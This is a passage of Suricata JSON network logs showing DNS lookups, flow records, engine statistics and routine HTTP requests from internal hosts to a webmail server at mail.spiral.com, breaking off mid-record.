{"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:46.141331+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=delete_memos","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:46.155742+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20092,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:46.311420+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439}} {"timestamp":"2020-02-29T00:00:49.000173+0000","event_type":"stats","stats":{"uptime":13701,"capture":{"kernel_packets":131881,"kernel_drops":0},"decoder":{"pkts":131892,"bytes":91639214,"invalid":176,"ipv4":130475,"ipv6":8,"ethernet":131892,"raw":0,"null":0,"sll":0,"tcp":125527,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2624,"new_pruned":15,"est_pruned":2215,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":54466,"memcap":0}}} {"timestamp":"2020-02-29T00:00:51.000587+0000","flow_id":1764268018371447,"event_type":"flow","src_ip":"192.168.10.122","src_port":43607,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:50.134007+0000","end":"2020-02-28T23:55:50.242455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.002278+0000","flow_id":1372824699014401,"event_type":"flow","src_ip":"192.168.10.122","src_port":36975,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:50.396545+0000","end":"2020-02-28T23:55:50.504392+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.314253+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":16944,"tx_id":2}} {"timestamp":"2020-02-29T00:00:52.000622+0000","flow_id":931516809444240,"event_type":"flow","src_ip":"192.168.10.122","src_port":37867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:51.686992+0000","end":"2020-02-28T23:55:51.794880+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:55.000149+0000","flow_id":423121546112077,"event_type":"flow","src_ip":"192.168.10.81","src_port":52610,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":23,"bytes_toserver":4627,"bytes_toclient":18466,"start":"2020-02-28T23:59:47.060493+0000","end":"2020-02-28T23:59:53.055087+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.001755+0000","flow_id":1730797353766896,"event_type":"flow","src_ip":"192.168.10.81","src_port":52616,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1876,"bytes_toclient":5082,"start":"2020-02-28T23:59:47.987120+0000","end":"2020-02-28T23:59:53.055044+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.002779+0000","flow_id":2195066138595643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52620,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1877,"bytes_toclient":4848,"start":"2020-02-28T23:59:47.987451+0000","end":"2020-02-28T23:59:53.056574+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.003615+0000","flow_id":1364127405772621,"event_type":"flow","src_ip":"192.168.10.81","src_port":52614,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1881,"bytes_toclient":4146,"start":"2020-02-28T23:59:47.986957+0000","end":"2020-02-28T23:59:53.056615+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.004287+0000","flow_id":815591362597012,"event_type":"flow","src_ip":"192.168.10.81","src_port":52618,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":3690,"bytes_toclient":16828,"start":"2020-02-28T23:59:47.987284+0000","end":"2020-02-28T23:59:53.171824+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:56.000163+0000","event_type":"stats","stats":{"uptime":13708,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2624,"new_pruned":15,"est_pruned":2218,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} {"timestamp":"2020-02-29T00:00:56.001332+0000","flow_id":75620021953358,"event_type":"flow","src_ip":"192.168.10.122","src_port":58313,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.844622+0000","end":"2020-02-28T23:55:55.956115+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:56.001411+0000","flow_id":982596855727262,"event_type":"flow","src_ip":"192.168.10.122","src_port":44985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.591006+0000","end":"2020-02-28T23:55:55.699356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:57.000760+0000","flow_id":1865350074121926,"event_type":"flow","src_ip":"192.168.10.122","src_port":52535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:56.245446+0000","end":"2020-02-28T23:55:56.353917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:03.000383+0000","event_type":"stats","stats":{"uptime":13715,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2629,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} {"timestamp":"2020-02-29T00:01:04.000551+0000","flow_id":1157019786067524,"event_type":"flow","src_ip":"192.168.10.130","src_port":34678,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2044,"bytes_toclient":16835,"start":"2020-02-28T23:59:20.376388+0000","end":"2020-02-29T00:00:03.894198+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:07.000910+0000","flow_id":1265931569107445,"event_type":"flow","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":15,"bytes_toserver":1762,"bytes_toclient":13104,"start":"2020-02-28T23:59:56.365045+0000","end":"2020-02-29T00:00:06.130670+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:08.000546+0000","flow_id":741056500184452,"event_type":"flow","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":49,"pkts_toclient":52,"bytes_toserver":11993,"bytes_toclient":43282,"start":"2020-02-28T23:59:47.963972+0000","end":"2020-02-29T00:00:07.960343+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:10.000189+0000","event_type":"stats","stats":{"uptime":13722,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2017,"memcap":0}}} {"timestamp":"2020-02-29T00:01:12.000518+0000","flow_id":922995595600655,"event_type":"flow","src_ip":"192.168.10.122","src_port":33317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-28T23:56:10.779023+0000","end":"2020-02-28T23:56:11.012016+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:13.484239+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17057,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:13.778567+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615}} {"timestamp":"2020-02-29T00:01:16.886820+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39617,"tx_id":0}} {"timestamp":"2020-02-29T00:01:16.894066+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61204,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:17.000126+0000","event_type":"stats","stats":{"uptime":13729,"capture":{"kernel_packets":131900,"kernel_drops":0},"decoder":{"pkts":131920,"bytes":91649600,"invalid":176,"ipv4":130501,"ipv6":8,"ethernet":131920,"raw":0,"null":0,"sll":0,"tcp":125551,"udp":4760,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2652,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2668,"synack":2659,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1700,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2169,"failed_udp":106},"tx":{"http":4382,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2245}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":71339,"memcap":0}}} {"timestamp":"2020-02-29T00:01:17.000725+0000","flow_id":715535805556464,"event_type":"flow","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1167,"bytes_toclient":9791,"start":"2020-02-29T00:00:03.894704+0000","end":"2020-02-29T00:00:16.593038+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:17.119588+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:01:17.163421+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.165928+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:01:17.185752+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.193887+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:01:17.196121+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 